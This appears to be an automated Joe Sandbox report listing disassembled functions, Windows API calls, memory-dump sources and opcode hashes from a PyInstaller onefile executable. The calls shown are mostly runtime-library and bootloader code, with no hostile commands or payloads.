Part of subcall function 00007FF64487CE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF64487CE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF64487CC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF64487CCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF64487CD21

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction ID: 20406683c3d03415e07bcf6f084e28491c8a870ba451ed3030105021b52fbf39
Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
Instruction Fuzzy Hash: AF311821F0C5468DFA54BB659CF32B91A81AFA1784F449035EE0EC72DFDE6DE844D211

Function 00007FF64488013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644880180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF644880277

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: db6755850ae78ef7e38998cba850e33e3dd2e148651b14ab5a6fe3f820f7c41a
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 2D51F731B0D6418EF724BE69948267A6291AF86BB4F1A4634DD6D837CDCF3CE4019720

Function 00007FF64488C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF64488C2CD), ref: 00007FF64488C180
GetLastError.KERNEL32(?,?,?,?,?,00007FF64488C2CD), ref: 00007FF64488C18A

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: e2861e93b0de3ffbced3346885e5fece54c8e8843f6073b18273fff152138241
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: C311042660CA8185DA20BB25A885169B361BB91FF0F540331EE7D87BDCCF3CD0148700

Function 00007FF64488A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A95E
GetLastError.KERNEL32(?,?,?,00007FF644892D22,?,?,?,00007FF644892D5F,?,?,00000000,00007FF644893225,?,?,?,00007FF644893157), ref: 00007FF64488A968

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: f5ddc91adfb0ba349af405d72a9fbff26ad0d6a50a078a344d395667dc2e0fad
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 92E08C21F0D6428AFF1ABBF2A8C713812916FC8B00F440034DC1DC22AAEE2CE8828310

Function 00007FF64488AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABC6
GetLastError.KERNEL32(?,?,?,00007FF64488A9D5,?,?,00000000,00007FF64488AA8A), ref: 00007FF64488ABD0

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: 59b189c65cfb96843706c69760e74eb70b7cee45c1406d55c645a375db9775ae
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 65219611F1CA8249FA94B75194D637922929FC4BA0F084239DE2EC77DDDF6CE4418300

Function 00007FF64488BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488BED4

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 0b893ed7ea0b77047f18fba12e5c3f55551b9bbfb53913e418721c776a8da696
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 2841A43291C6458BEA24BB19E58227973A0EFD5780F140131EF8EC76DACF6CE402CB51

Function 00007FF644877F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF64487803A

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
Instruction ID: b180facd7e6e6c62b153ad200c8d47848d85e16c0edc9d3332a0e331b2c62582
Opcode Fuzzy Hash: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
Instruction Fuzzy Hash: 0D21C721B1CA564EFE50BB226D963BA9651BF45BC4F8C4430EE0D9778ADE7DE441C310

Function 00007FF64488B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488B9C2

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: f792a154c4f0c818ab992283cc149fc0daed787d2a1d52ccbdc0b672c7175d02
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: 05313C22A1C65289E652BB55888337C2A90AFC0BA4F911135ED5D873DBEF7CE8858721

Function 00007FF644885F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644885EF9

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 96bb4147fc3beb661b4045480d50cd633d694023333b54d5cc802c631a456edf
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: C0117232E1C6828AEA60BF11948227DA2A4BF85B84F444435EF8CD7ADFDF3DE5008710

Function 00007FF644896354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644896377

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: d0ee589d1281d71e3a34cff6dd1bc709d7b0c5895c603c0e8665e6d90be33361
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 4D215032A1CE418ADB61BF18D48237977A0BB84B94F544238EE5E976DDDF3DD4118B00

Function 00007FF6448803BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644880410

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 1f3d8853ab592a710b04ff31ada186bb604cd8e8fe0a49fecf4c74ac41599cfc
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 6E01C461A4C74684EA04FF529982079A691BF86FE4F494631EE5C93BDFCF3CE4018310

Function 00007FF644878E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

LoadLibraryExW.KERNEL32(?,00007FF644876476,?,00007FF64487336E), ref: 00007FF644878EA2

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
Instruction ID: 67019d0a427582bbabe4f5d9f2cc0d5eb1b92673759a972287699f474bbe11de
Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
Instruction Fuzzy Hash: 56D08C11B2864646EA44B76BBA876295251AF89FC0F889035EE0D47B5EEC3CD0514B00

Function 00007FFDFF191DF2 Relevance: 1.3, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFF1EE741

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 30f5a756a2453722bd5fc7c60f00636787785f570310c9cdf96fb774af82a049
Instruction ID: 4dbf44e84b5c8952eeaad61a49263575df89162f7ef362121bb023ae0a6a079c
Opcode Fuzzy Hash: 30f5a756a2453722bd5fc7c60f00636787785f570310c9cdf96fb774af82a049
Instruction Fuzzy Hash: 38317E33F0824289F7A49F259460A7E6391EF80B44F194635DA39466CDCF79F8918B80

Function 00007FFDFF19EE30 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?,00007FFDFF19ED5B), ref: 00007FFDFF19EE61

Memory Dump Source

Source File: 00000001.00000002.2198558047.00007FFDFF191000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFF190000, based on PE: true

Associated: 00000001.00000002.2198504238.00007FFDFF190000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF212000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF214000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF23C000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF247000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198558047.00007FFDFF252000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198911802.00007FFDFF256000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff190000_sB2ClgrGng.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d29a44c3b10b43c9c66d24f2e9978454315fcbd019f87c95ebe5899c13090e1b
Instruction ID: 45611ab87021c74dd8fded0c7fc7e120a26a797983b0611733f8ce3e2515785e
Opcode Fuzzy Hash: d29a44c3b10b43c9c66d24f2e9978454315fcbd019f87c95ebe5899c13090e1b
Instruction Fuzzy Hash: D221A133B0878087E3649F22E59066EB3A5FB88B94F544225EBA843F99CF3CD155CB40

Function 00007FF64488D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF644880C90,?,?,?,00007FF6448822FA,?,?,?,?,?,00007FF644883AE9), ref: 00007FF64488D63A

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 0ce46b99c2161101720227423c37da436508429bcf98fc69ee809bc8fab3f170
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 4EF0F811F4D24A8DFE65B7B158C367912D15F88BB0F480730DD2EC62CAEE2DE4809690

Non-executed Functions

Function 00007FF6448789E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878A56

Part of subcall function 00007FF64488A47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64488A490

Part of subcall function 00007FF64488871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644888783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878AE6
CreateProcessW.KERNEL32 ref: 00007FF644878B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878B28

Part of subcall function 00007FF644872C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
Part of subcall function 00007FF644872C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
Part of subcall function 00007FF644872C50: MessageBoxW.USER32 ref: 00007FF644872D99

RegisterClassW.USER32 ref: 00007FF644878B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878B8B
CreateWindowExW.USER32 ref: 00007FF644878BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C15
PeekMessageW.USER32 ref: 00007FF644878C39
TranslateMessage.USER32 ref: 00007FF644878C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C51
PeekMessageW.USER32 ref: 00007FF644878C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878E04
GetExitCodeProcess.KERNEL32 ref: 00007FF644878E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF644873F77), ref: 00007FF644878E2F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF644878B95
CreateProcessW, xrefs: 00007FF644878B37
PyInstallerOnefileHiddenWindow, xrefs: 00007FF644878B54
Failed to create child process!, xrefs: 00007FF644878B30

Memory Dump Source

Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: 60f8c9ef815a28acad91f9932d2e75c1c543784b6deed392831a18129e2f2de9
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: 60D12F31A0CE868AEB10BF74E8962A937A4FF84B58F404235DE5D93AACDF3DD5558700

Function 00007FFDFAF94440 Relevance: 23.2, APIs: 1, Strings: 12, Instructions: 452COMMON

Download Yara Rule

APIs

00007FFE148D2010.VCRUNTIME140 ref: 00007FFDFAF949C4

Strings

%s mode not allowed: %s, xrefs: 00007FFDFAF9497E
no such %s mode: %s, xrefs: 00007FFDFAF948EE
access, xrefs: 00007FFDFAF94885
mode, xrefs: 00007FFDFAF9479E
no such vfs: %s, xrefs: 00007FFDFAF94A74
cach, xrefs: 00007FFDFAF947AF
cach, xrefs: 00007FFDFAF94940
localhos, xrefs: 00007FFDFAF9459E
file, xrefs: 00007FFDFAF944BB
cache, xrefs: 00007FFDFAF9485B
invalid uri authority: %.*s, xrefs: 00007FFDFAF945C7
mode, xrefs: 00007FFDFAF94921

Memory Dump Source

Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true

